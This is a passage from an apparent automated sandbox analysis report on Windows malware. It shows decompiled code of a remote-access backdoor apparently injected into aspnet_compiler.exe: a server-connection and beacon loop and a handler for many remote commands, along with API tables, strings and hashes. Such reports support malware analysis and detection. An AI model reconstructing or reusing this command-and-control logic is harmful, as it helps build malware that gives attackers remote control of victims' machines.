							E0040415E(_t415,  &_v124, 0x80000001, _t760, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"); // executed
							_t254 = E0040D28D(__eflags); // executed
							_t255 = E0041A79D( &_v1552, _t254);
							_t777 = _t776 - 0x18;
							_t258 = E0041A879(_t415,  &_v1528, 0x473220);
							_t259 = E0041A6E9(_t415,  &_v1504, _t751 & 0x0000ffff);
							_t260 = E00401E45( &_v16, _t751 & 0x0000ffff, _t760, __eflags, 0);
							_t263 = E0041A6E9(_t415,  &_v1480, GetTickCount());
							_t265 = E0041A6E9(_t415,  &_v1456, E0041A641( &_v1480));
							_t267 = E0041A5F1(_t415,  &_v1432, 0x472ec8); // executed
							_t268 = E0041A879(_t415,  &_v1408, _t267);
							_t269 = E0041A879(_t415,  &_v1384, 0x472d40);
							_t270 = E0041A879(_t415,  &_v1360,  &_v124);
							_t271 = E0041A879(_t415,  &_v1336,  &_v40);
							_t273 = E0041A879(_t415,  &_v1312, 0x473618);
							_t274 = E0040EE14( &_v1288);
							_t275 = E0041A879(_t415,  &_v1264, 0x4732a4);
							_t679 = E00402EF0(_t415,  &_v256, E00402EF0(_t415,  &_v232, E00402EF0(_t415,  &_v208, E00402EF0(_t415,  &_v304, E00402EF0(_t415,  &_v328, E00402EF0(_t415,  &_v352, E00402EF0(_t415,  &_v376, E00402E81( &_v400, E00402EF0(_t415,  &_v424, E00402E81( &_v448, E00402EF0(_t415,  &_v472, E00402EF0(_t415,  &_v496, E00402EF0(_t415,  &_v520, E00402EF0(_t415,  &_v544, E00402EF0(_t415,  &_v568, E00408832(_t415,  &_v592, E00402EF0(_t415,  &_v616, E00402E81( &_v640, E00402EF0(_t415,  &_v664, E00402E81( &_v688, E00402EF0(_t415,  &_v712, E00408853(_t415,  &_v736, E00402EF0(_t415,  &_v760, E00402E81( &_v784, E00402EF0(_t415,  &_v808, E00402E81( &_v832, E00402EF0(_t415,  &_v856, E00402E81( &_v880, E00402EF0(_t415,  &_v904, E00402E81( &_v928, E00402EF0(_t415,  &_v952, E00408832(_t415,  &_v976, E00402EF0(_t415,  &_v1000, E00408832(_t415,  &_v1024, E00402EF0(_t415,  &_v1048, E00402E81( &_v1072, E00402EF0(_t415,  &_v1096, E00402EF0(_t415,  &_v1120, E00402EF0(_t415,  &_v1144, E00402E81( &_v1168, E00402EF0(_t415,  &_v1192, E00402E81( &_v1216, E00402F11( &_v1240,  &_v184, _t760, 0x472ec8), _t275), _t760, __eflags, 0x472ec8), _t274), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473950), _t760, __eflags, 0x472ec8), _t273), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v160), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags, "4.6.0 Pro"), _t760, __eflags, 0x472ec8), _t271), _t760, __eflags, 0x472ec8), _t270), _t760, __eflags, 0x472ec8), _t269), _t760, __eflags, 0x472ec8), _t268), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  *0x46f9d4 & 0x000000ff), _t760, __eflags, 0x472ec8), _t265), _t760, __eflags, 0x472ec8), _t263), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v136), _t760, __eflags, 0x472ec8), _t760, __eflags, _t260), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473268), _t760, __eflags, 0x472ec8), _t259), _t760, __eflags, 0x472ec8), _t258), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v280), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x4732d4), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v64), _t760, __eflags, 0x472ec8);
							E00402E81(_t777, _t318, _t255);
							_t753 = 0x4734e8;
							_push(0x4b);
							E00404A81(0x4734e8, _t318, __eflags);
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401EE9();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401EE9();
							E00404BF0(0x4734e8, _t318, E00414E1C, 1);
							_t379 =  *0x470d5c; // 0x0
							__eflags = _t379;
							if(_t379 != 0) {
								__eflags =  *0x470d4a;
								if( *0x470d4a != 0) {
									_t379 =  *_t379();
									 *0x470d4a = 0;
								}
							}
							__eflags =  *0x47308a;
							if( *0x47308a != 0) {
								_t379 = E0040A5C4(_t415, 0x473040, _t679);
							}
							E00405A4B(_t379);
							_t778 = _t777 - 0x18;
							E00402073(_t415, _t778, _t679, _t760, "Disconnected");
							_t779 = _t778 - 0x18;
							E00402073(_t415, _t779, _t679, _t760, "!");
							E0041A04A(_t415, 0x472ec8);
							_t764 = _t779 + 0x30;
							__eflags =  *0x472acb;
							if( *0x472acb != 0) {
								__eflags = 0;
								CreateThread(0, 0, E00419872, 0, 0, 0);
							}
							E00401FB8();
							E00401FB8();
							E00401EE9();
							_t749 = 0x473298;
						}
					} else {
						_t780 = _t764 - 0x18;
						E00402073(_t415, _t780, _t679, _t760, "Connection Error: Unable to create socket");
						_t781 = _t780 - 0x18;
						E00402073(_t415, _t781, _t679, _t760, "E");
						E0041A04A(_t415, _t749);
						_t764 = _t781 + 0x30;
					}
				} else {
					__imp__#111();
					_t395 = E0041B45A( &_v40, _t211);
					_t782 = _t764 - 0x18;
					_t679 = "Connection Error: ";
					E004052DD(_t415, _t782, "Connection Error: ", _t760, _t789, _t395);
					_t783 = _t782 - 0x14;
					E00402073(_t415, _t783, "Connection Error: ", _t760, "E");
					E0041A04A(_t415, _t749);
					_t764 = _t783 + 0x30;
					E00401FB8();
					_t753 = 0x4734e8;
				}
				E00404E06(_t679);
				_t415 =  &(_t415->nLength);
				_t216 = E004021DA( &_v76);
				_t790 = _t415 - _t216;
				if(_t415 >= _t216) {
					_t415 = 0;
					_t221 = E0043A3AC(_t218, E00401F8B(E00401E45(_t749, _t679, _t760, _t790, 2))) * 0x3e8;
					_t787 = _t221;
					Sleep(_t221);
				}
				E00401E6D( &_v16, _t679);
				goto L4;
			}


















































































































































                    0x0041427d
                    0x0041427e
                    0x00414280
                    0x0041428b
                    0x00414296
                    0x0041429b
                    0x004142b1
                    0x004142b9
                    0x004142bb
                    0x004142bb
                    0x004142c2
                    0x004142c2
                    0x004142c8
                    0x004142d2
                    0x004142db
                    0x004142e0
                    0x004142e6
                    0x004142ee
                    0x004142f3
                    0x004142f6
                    0x004142f8
                    0x00414301
                    0x00414306
                    0x0041430d
                    0x00414312
                    0x00414314
                    0x0041431a
                    0x00414321
                    0x00414332
                    0x0041433c
                    0x00414343
                    0x00414354
                    0x0041435e
                    0x00414365
                    0x0041436e
                    0x00414377
                    0x0041437c
                    0x00414380
                    0x00414385
                    0x00414385
                    0x00414388
                    0x00414388
                    0x0041438b
                    0x00414399
                    0x004143a2
                    0x004143a7
                    0x004143ad
                    0x004143b5
                    0x004143ba
                    0x004143c2
                    0x004143f3
                    0x004143fb
                    0x00414403
                    0x0041440d
                    0x00414412
                    0x00414419
                    0x0041441e
                    0x00414421
                    0x00414423
                    0x00414433
                    0x0041443a
                    0x00414425
                    0x00414425
                    0x0041442c
                    0x0041442c
                    0x0041443f
                    0x00414444
                    0x00414474
                    0x00414479
                    0x00414483
                    0x00414488
                    0x0041448d
                    0x00414493
                    0x0041449b
                    0x004144ae
                    0x004144c1
                    0x004144c6
                    0x004144ca
                    0x004144cf
                    0x004144d1
                    0x0041451c
                    0x00414523
                    0x00414528
                    0x0041452a
                    0x0041455d
                    0x00414565
                    0x0041456a
                    0x0041456c
                    0x00414577
                    0x0041457c
                    0x0041458c
                    0x004145d3
                    0x004145d7
                    0x004145dc
                    0x004145e6
                    0x004145eb
                    0x004145f6
                    0x00414601
                    0x0041460c
                    0x00414617
                    0x0041461c
                    0x0041462b
                    0x0041462c
                    0x0041462d
                    0x0041462e
                    0x0041462f
                    0x00414630
                    0x00414635
                    0x00414643
                    0x00414653
                    0x00414667
                    0x00414682
                    0x0041468e
                    0x00414696
                    0x004146b2
                    0x004146b9
                    0x004146bb
                    0x004146c0
                    0x004146c3
                    0x004146c5
                    0x004146ce
                    0x004146d4
                    0x004146d4
                    0x004146d9
                    0x004146ef
                    0x004146f4
                    0x004146f9
                    0x004146fc
                    0x004146fe
                    0x00414700
                    0x00414704
                    0x00414704
                    0x0041470f
                    0x00414714
                    0x00414721
                    0x00414726
                    0x00414750
                    0x00414764
                    0x0041477b
                    0x00414798
                    0x004147ac
                    0x004147c2
                    0x004147cf
                    0x004147e1
                    0x004147f1
                    0x00414801
                    0x00414821
                    0x00414834
                    0x00414846
                    0x00414aab
                    0x00414aaf
                    0x00414ab5
                    0x00414aba
                    0x00414abe
                    0x00414ac9
                    0x00414ad4
                    0x00414adf
                    0x00414aea
                    0x00414af5
                    0x00414b00
                    0x00414b0b
                    0x00414b16
                    0x00414b21
                    0x00414b2c
                    0x00414b37
                    0x00414b42
                    0x00414b4d
                    0x00414b58
                    0x00414b63
                    0x00414b6e
                    0x00414b79
                    0x00414b84
                    0x00414b8f
                    0x00414b9a
                    0x00414ba5
                    0x00414bb0
                    0x00414bbb
                    0x00414bc6
                    0x00414bd1
                    0x00414bdc
                    0x00414be7
                    0x00414bf2
                    0x00414bfd
                    0x00414c08
                    0x00414c13
                    0x00414c1e
                    0x00414c29
                    0x00414c34
                    0x00414c3f
                    0x00414c4a
                    0x00414c55
                    0x00414c60
                    0x00414c6b
                    0x00414c76
                    0x00414c81
                    0x00414c8c
                    0x00414c97
                    0x00414ca2
                    0x00414cad
                    0x00414cb8
                    0x00414cc3
                    0x00414cce
                    0x00414cd9
                    0x00414ce4
                    0x00414cef
                    0x00414cfa
                    0x00414d05
                    0x00414d10
                    0x00414d1b
                    0x00414d26
                    0x00414d2e
                    0x00414d3c
                    0x00414d41
                    0x00414d46
                    0x00414d48
                    0x00414d4a
                    0x00414d51
                    0x00414d53
                    0x00414d55
                    0x00414d55
                    0x00414d51
                    0x00414d5c
                    0x00414d63
                    0x00414d6a
                    0x00414d6a
                    0x00414d6f
                    0x00414d74
                    0x00414d7e
                    0x00414d83
                    0x00414d8d
                    0x00414d92
                    0x00414d97
                    0x00414d9a
                    0x00414da1
                    0x00414da3
                    0x00414daf
                    0x00414daf
                    0x00414db8
                    0x00414dc3
                    0x00414dcb
                    0x00414dd0
                    0x00414dd0
                    0x0041452c
                    0x0041452c
                    0x00414536
                    0x0041453b
                    0x00414545
                    0x0041454a
                    0x0041454f
                    0x0041454f
                    0x004144d3
                    0x004144d3
                    0x004144de
                    0x004144e3
                    0x004144e6
                    0x004144ee
                    0x004144f3
                    0x004144fd
                    0x00414502
                    0x00414507
                    0x0041450d
                    0x00414512
                    0x00414512
                    0x00414dd7
                    0x00414ddf
                    0x00414de0
                    0x00414de5
                    0x00414de7
                    0x00414ded
                    0x00414e01
                    0x00414e01
                    0x00414e09
                    0x00414e09
                    0x00414e12
                    0x00000000

                    APIs
                    • Sleep.KERNEL32(00000000,00000029,00473238,00473298,00000000), ref: 004142C2
                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 004144D3
                    • Sleep.KERNEL32(00000000,00000002), ref: 00414E09
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ErrorLastLocalTime
                    • String ID: 2G$ | $%I64u$4.6.0 Pro$82G$@-G$@0G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name$4G$4G$4G$Cqt
                    • API String ID: 524882891-3434259954
                    • Opcode ID: 4496f8889da1b28f6c22a62faec8c28fb262ed6628df1ca4bb2a39669b70bbd6
                    • Instruction ID: ab0e32b11b9d89d3eba901e54de1f942eff96493c18d1503d8c82c51ace3a389
                    • Opcode Fuzzy Hash: 4496f8889da1b28f6c22a62faec8c28fb262ed6628df1ca4bb2a39669b70bbd6
                    • Instruction Fuzzy Hash: 52529D31A001155BCB18F761DD96AEEB3699F90308F1041BFF40A761E2EF785F868A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00414E1C Relevance: 23.3, APIs: 7, Strings: 6, Instructions: 538COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 924 414e1c-414ea2 call 4020d6 SetEvent call 401f8b call 404182 call 4020d6 * 2 call 41a976 937 415bc2-415bcb 924->937 938 414ea8 924->938 941 415bd1-415bd8 937->941 942 416118-416141 call 401e6d call 401fb8 * 2 937->942 939 415ac9-415b89 call 4162bc call 401e45 call 401f8b call 43a3ac call 41689b call 4090da call 401e45 call 4020d6 call 401e45 call 4020d6 call 401e45 call 401f8b call 40415e call 401e45 call 401f8b call 40415e call 408909 938->939 940 414eae-414eb2 938->940 1225 415bb1-415bbd call 40905e 939->1225 1226 415b8b-415bac call 4090ee call 409069 call 40908a 939->1226 940->942 944 414eb8-414eba 940->944 945 415ca0-415d06 call 4081d8 call 401e45 call 4020d6 call 401e45 call 4020d6 call 401e45 call 4020d6 call 40647b call 4081e6 941->945 946 415c02-415c22 call 401e45 call 401f8b call 43a3ac call 409003 941->946 947 415d65-415d92 call 401e45 call 401f8b call 401e45 call 401f8b call 43a3ac SetWindowTextW 941->947 948 415f24-415f29 call 419991 941->948 949 415c27-415c8b call 401e45 call 401f8b StrToIntA call 401e45 call 401f8b call 40cf38 call 401ee4 call 401e45 call 41ae6b call 401ee4 941->949 950 415ee8-415f15 call 401e45 call 4051c3 call 401e45 call 419970 941->950 951 415d0b-415d2b call 401e45 call 401f8b call 43a3ac call 41a664 941->951 952 415f2e-415f33 call 4199d0 941->952 953 415e71-415e8c call 401e45 call 4020d6 call 416495 941->953 954 415e91-415e96 call 4199d8 941->954 955 415d30-415d50 call 401e45 call 401f8b call 43a3ac call 41a690 941->955 956 415d55 941->956 957 415f99-41610a call 405b0b call 401e45 * 2 call 402f11 call 402ef0 call 405eda call 401fb8 941->957 958 415f38-415f3f 941->958 959 415e9b-415ea2 941->959 960 415e1a-415e39 call 401e45 call 405ae5 941->960 961 415f1a-415f1f call 419872 941->961 962 415d9d-415db8 call 401e45 call 4020d6 call 418608 941->962 963 415dbd-415dd8 call 401e45 call 4020d6 call 403f08 941->963 964 415ddd-415e15 call 401e45 call 401f8b call 402073 call 401f8b call 412a57 941->964 965 415d5c-415d5f 941->965 966 415bdf-415bf5 call 401e45 call 4020d6 941->966 969 414ec1-414ef2 GetTickCount call 41a6e9 call 41a641 call 41a6e9 call 41a5f1 944->969 970 41506d-415074 944->970 945->942 946->942 947->962 948->942 1190 415c92-415c9b call 401ee9 949->1190 1191 415c8d call 41b35b 949->1191 950->942 951->942 952->942 954->942 955->942 956->965 1173 41610f-416113 call 401fb8 957->1173 1174 41610a call 401fb8 957->1174 983 415f41-415f78 call 401e45 call 41a6e9 call 402ef0 * 2 958->983 984 415f82-415f89 call 406d6c 958->984 972 415ea4-415ec4 call 41b6a6 959->972 973 415ec9-415ee3 ShowWindow SetForegroundWindow 959->973 1074 415e52-415e62 call 401e45 call 4020d6 960->1074 1075 415e3b-415e50 call 401e45 call 4020d6 960->1075 961->942 1079 415bfa-415bfd 962->1079 963->1079 964->942 965->947 966->1079 1080 415bf5 call 4071bd 966->1080 1128 414ef7-414ff1 call 41a879 call 401e45 call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 404a81 call 401fb8 * 6 call 401ee9 call 401fb8 * 2 call 401e45 call 401f8b call 43a3ac 969->1128 999 41503a-41503f call 4050c4 970->999 972->942 973->942 983->984 984->942 1053 415f8f-415f94 call 40cd03 984->1053 999->942 1053->942 1144 415e67-415e6c call 4162cd 1074->1144 1075->1144 1079->942 1080->1079 1251 414ff3-414fff call 4046d3 1128->1251 1252 415019-415031 call 401e45 call 405ae5 1128->1252 1144->942 1173->942 1174->1173 1190->942 1191->1190 1225->942 1226->1225 1258 415001-415007 call 404fd4 1251->1258 1259 41500c-415014 call 404f31 1251->1259 1252->942 1263 415037-415038 1252->1263 1258->942 1259->942 1263->999
                    C-Code - Quality: 80%
                    			E00414E1C(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a77, intOrPtr _a79, intOrPtr _a81, intOrPtr _a86, intOrPtr _a89) {
				char _v28;
				char _v56;
				void* _v60;
				char _v80;
				void* _v84;
				char _v104;
				void* _v108;
				char _v128;
				void* _v132;
				void* _v156;
				char _v260;
				char _v264;
				char _v272;
				char _v284;
				char _v288;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v332;
				void* _v344;
				long _v348;
				int _v352;
				char _v356;
				char _v360;
				void* _v364;
				char _v376;
				char _v380;
				char _v384;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				int _v408;
				char _v412;
				char _v416;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v476;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				intOrPtr _v855621291;
				intOrPtr _v1124056743;
				void* __ebp;
				void* _t321;
				void* _t323;
				intOrPtr _t451;
				intOrPtr _t452;
				void* _t453;
				void* _t455;
				signed int _t456;
				signed int _t460;
				signed int _t462;
				void* _t465;
				void* _t466;
				void* _t467;
				void* _t471;
				void* _t477;

				_t476 = __eflags;
				_t437 = __edx;
				_t371 = __ebx;
				_t460 = _t462;
				_push(__ebx);
				_t451 = _a4;
				E004020D6(__ebx,  &_v308, __edx, __eflags, _t451 + 0xc);
				SetEvent( *(_t451 + 0x24));
				_t452 =  *((intOrPtr*)(E00401F8B( &_v312)));
				E00404182( &_v312,  &_v288, 4, 0xffffffff);
				_t465 = (_t462 & 0xfffffff8) - 0x1a4;
				E004020D6(__ebx, _t465, _t437, _t476, 0x472ec8);
				_t466 = _t465 - 0x18;
				E004020D6(__ebx, _t466, _t437, _t476,  &_v304);
				E0041A976( &_v468, _t437);
				_t467 = _t466 + 0x30;
				_t477 = _t452 - 0x8f;
				if(_t477 > 0) {
					_t453 = _t452 + 0xffffff70;
					__eflags = _t453 - 0x3b;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t453 + 0x416280) & 0x000000ff) * 4 +  &M0041621C))) {
							case 0:
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__ecx);
								__ecx = __eax;
								__eax = E00409003(__ecx);
								goto L138;
							case 1:
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v448;
								__edi = __eax;
								__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
								__eax = E00401F8B(__eax);
								__dl = 0x30;
								__ecx =  &_v440;
								__eax = E0040CF38( &_v440, __edx, __eax);
								__ecx =  &_v440;
								__eax = E00401EE4( &_v440);
								__ecx =  &_v452;
								__esi = __eax;
								__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 2);
								__edx = __esi;
								__ecx = __eax;
								__eax = E0041AE6B(__eax, __esi);
								__ecx =  &_v444;
								__edx = E00401EE4( &_v444);
								__ecx = __edi;
								__eax = E0041B35B(__edi, __edx);
								goto L103;
							case 2:
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
								__eax = E00401F8B(__eax);
								__ecx =  &_v448;
								__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L22;
							case 3:
								__ebx = 0;
								__ecx =  &_v444;
								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__edx = "0";
								__ecx = __eax;
								__eax = E00405AE5(__edx);
								__ecx =  &_v448;
								_push(0);
								__eflags = __al;
								if(__eflags == 0) {
									__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(0, __esp, __edx, __eflags, __eax);
									__ecx = 0x4732ec;
								} else {
									__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020D6(0, __esp, __edx, __eflags, __eax);
									__ecx = 0x470d62;
								}
								__eax = E004162CD(__ebx, __ecx, __edx);
								goto L138;
							case 4:
								__ecx =  &_v444;
								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00416495(__ecx, __edx, __edi, __eflags);
								goto L100;
							case 5:
								E004020D6(__ebx, _t467 - 0x18, _t437, __eflags, E00401E45( &_v444, _t437, _t460, __eflags, 0));
								E004071BD(_t371, _t437);
								goto L100;
							case 6:
								__ecx =  &_v444;
								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00418608(__ebx, __edx, __esi, __ebp);
								goto L100;
							case 7:
								__ecx =  &_v444;
								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00403F08(__ebx, __edx, __esi, __ebp, __eflags);
								goto L100;
							case 8:
								__eax = E00419872(__ebx);
								goto L138;
							case 9:
								__eax = E00419991(__ebx, __eflags);
								goto L138;
							case 0xa:
								__eax = E004199D0(__eax);
								goto L138;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E004051C3(0);
								__ecx =  &_v452;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E00419970(__ecx, __edx, __esi);
								goto L138;
							case 0xc:
								__eax = E004199D8(__edx);
								goto L138;
							case 0xd:
								__eflags =  *0x46f9d0 - 1;
								if(__eflags != 0) {
									__eflags = E00406D6C();
									if(__eflags != 0) {
										goto L130;
									}
								} else {
									__ecx =  &_v444;
									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
									__edx =  *0x46f9d0; // 0x1
									__ecx =  &_v380;
									__esp = __esp - 0x18;
									__esi = __esp;
									__edx = E0041A6E9(__ebx,  &_v380, __edx);
									__ecx =  &_v404;
									__edx = __eax;
									__ecx = __esi;
									__eax = E00402EF0(__ebx, __esi, __edx, __ebp, __eflags, __eax);
									_push(0xab);
									goto L14;
								}
								goto L138;
							case 0xe:
								__eflags =  *0x470d48;
								if( *0x470d48 != 0) {
									ShowWindow( *0x472b10, 9) = SetForegroundWindow( *0x472b10);
								} else {
									__cl = 1;
									__eax = E0041B6A6(__ebx, __ecx, __edx, __edi);
									__ebx = 0;
									__eax = CreateThread(0, 0, E0041BD68, 0, 0, 0);
									 *0x470d48 = 2;
								}
								goto L138;
							case 0xf:
								_push(5);
								goto L18;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L19;
							case 0x11:
								__ecx =  &_v260;
								__eax = E004081D8( &_v260);
								__ecx =  &_v444;
								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v452;
								__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v460;
								__eax = E00401E45( &_v460, __edx, __ebp, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v284;
								__eax = E0040647B(__ebx,  &_v284, __edx);
								__ecx =  &_v356;
								__eax = E004081E6();
								goto L138;
							case 0x12:
								_push(1);
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__eax);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00402073(__ebx, __esp, __edx, __ebp, __eax);
								_push("hlight");
								__ecx = 0x473238;
								__edx = E00401F8B(0x473238);
								__eax = E00412A57(0x473238, __edx);
								__esp = __esp + 0x20;
								goto L138;
							case 0x13:
								__ecx =  &_v432;
								__eax = E00405B0B(__ebx,  &_v432, __eflags);
								__ecx =  &_v444;
								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
								__ecx =  &_v448;
								__edx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
								__ecx =  &_v384;
								__edx = __eax;
								__ecx =  &_v408;
								__edx = __eax;
								__ecx =  &_v440;
								__eax = E00405EDA( &_v440, __edx, __eflags);
								__ecx =  &_v408;
								__eax = E00401FB8();
								__ecx =  &_v384;
								goto L135;
							case 0x14:
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__ecx);
								__ecx = __eax;
								__eax = E0041A664(__ecx);
								goto L138;
							case 0x15:
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__ecx);
								__ecx = __eax;
								__eax = E0041A690(__ecx);
								goto L138;
							case 0x16:
								__ecx =  &_v432;
								__eax = E004020BF(__ebx,  &_v432);
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
								__eax = E00401F8B(__eax);
								__edx =  &_v436;
								__ecx = __eax;
								__eax = E0041ADFE(__edx);
								__esp = __esp - 0x18;
								__eax =  &_v436;
								__esi = __esp;
								__ecx =  &_v448;
								_push( &_v436);
								_push(0x472ec8);
								_push(E00401E45( &_v448, __edx, __ebp, __eflags, 2));
								__ecx =  &_v452;
								__edx = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
								__ecx =  &_v344;
								__eax = E00402F11( &_v344, __eax, __ebp, __edi);
								goto L134;
							case 0x17:
								__ecx =  &_v444;
								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
								__eax = E00401F8B(__eax);
								__ecx =  &_v448;
								__esi = __eax;
								__eax = E00401E45( &_v448, __edx, __ebp, __eflags, 2);
								__edx = __esi;
								__ecx = __eax;
								__eax = E0041AE6B(__eax, __edx);
								__ecx =  &_v440;
								__eax = E004020BF(__ebx,  &_v440);
								__ecx =  &_v452;
								__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
								__eax = E00401F8B(__eax);
								__edx =  &_v444;
								__ecx = __eax;
								__eax = E0041ADFE(__edx);
								__esp = __esp - 0x18;
								__eax =  &_v444;
								__esi = __esp;
								__ecx =  &_v456;
								_push( &_v444);
								_push(0x472ec8);
								_push(E00401E45( &_v456, __edx, __ebp, __eflags, 0));
								__edx = "0";
								__ecx =  &_v348;
								__eax = E004052FE( &_v348, "0", __ebp, __edi);
								L134:
								_pop(__ecx);
								__edx = __eax;
								__ecx =  &_v376;
								__eax = E00402EF0(__ebx,  &_v376, __eax, __ebp, __eflags);
								_pop(__ecx);
								__edx = __eax;
								__ecx =  &_v400;
								__eax = E00402EF0(__ebx,  &_v400, __eax, __ebp, __eflags);
								_pop(__ecx);
								__edx = __eax;
								__ecx = __esi;
								__eax = E00402EF0(__ebx, __esi, __edx, __ebp, __eflags);
								_pop(__ecx);
								_push(0xca);
								__ecx = 0x4734e8;
								__eax = E00404A81(0x4734e8, __edx, __eflags);
								__ecx =  &_v428;
								__eax = E00401FB8();
								__ecx =  &_v404;
								__eax = E00401FB8();
								__ecx =  &_v360;
								L135:
								__eax = E00401FB8();
								goto L136;
							case 0x18:
								goto L138;
						}
					}
					goto L138;
				} else {
					if(_t477 == 0) {
						L140();
						_v348 = E0043A3AC(_t314, E00401F8B(E00401E45( &_v444, _t437, _t460, __eflags, 2)));
						_v344 =  &_v264;
						E0041689B(__ebx, _t437, 0x472ec8, _t460, __eflags,  &_v348);
						_t133 = E004090DA() - 1; // -1
						_t455 = _t133;
						_t321 = E00401E45( &_v452, _t437, _t460, __eflags, 3);
						_t471 = _t467 - 0x18;
						E004020D6(_t371, _t471, _t437, __eflags, _t321);
						_t323 = E00401E45( &_v460, _t437, _t460, __eflags, 2);
						E004020D6(_t371, _t471 - 0x18, _t437, __eflags, _t323);
						E0040415E(_t371, _t471, _t437, _t460, E00401F8B(E00401E45( &_v468, _t437, _t460, __eflags, 1)));
